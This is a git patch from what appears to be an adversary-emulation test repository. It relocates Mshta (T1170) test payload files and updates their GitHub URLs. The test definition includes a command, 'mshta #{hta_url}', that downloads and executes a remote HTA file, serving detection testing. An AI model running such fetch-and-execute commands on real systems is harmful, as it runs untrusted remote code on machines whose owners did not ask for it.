From b4ded762d48886bfdecbfcb68b2ec3f8293cf7c7 Mon Sep 17 00:00:00 2001 From: JB <35406993+cherokeejb@users.noreply.github.com> Date: Sat, 18 Jan 2020 12:47:37 -0600 Subject: [PATCH] moving recently added source files to /src per project spec (#783) * updates paths to files * moving T1170.hta to the source directory * moving mshta.sct to the /src directory Co-authored-by: Carrie Roberts --- atomics/T1170/T1170.yaml | 6 +++--- atomics/T1170/{ => src}/T1170.hta | 2 +- atomics/T1170/{ => src}/mshta.sct | 0 3 files changed, 4 insertions(+), 4 deletions(-) rename atomics/T1170/{ => src}/T1170.hta (96%) rename atomics/T1170/{ => src}/mshta.sct (100%) diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 5553b760..964679e8 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -12,7 +12,7 @@ atomic_tests: file_url: description: location of the payload type: Url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/mshta.sct executor: name: command_prompt elevation_required: false @@ -58,8 +58,8 @@ atomic_tests: hta_url: description: URL to HTA file for execution type: string - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/T1170.hta + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta executor: name: command_prompt command: | - mshta #{hta_url} \ No newline at end of file + mshta #{hta_url} diff --git a/atomics/T1170/T1170.hta b/atomics/T1170/src/T1170.hta similarity index 96% rename from atomics/T1170/T1170.hta rename to atomics/T1170/src/T1170.hta index 59101b61..b9df6d91 100644 --- a/atomics/T1170/T1170.hta +++ b/atomics/T1170/src/T1170.hta @@ -9,4 +9,4 @@ - \ No newline at end of file + diff --git a/atomics/T1170/mshta.sct b/atomics/T1170/src/mshta.sct similarity index 100% rename from atomics/T1170/mshta.sct rename to atomics/T1170/src/mshta.sct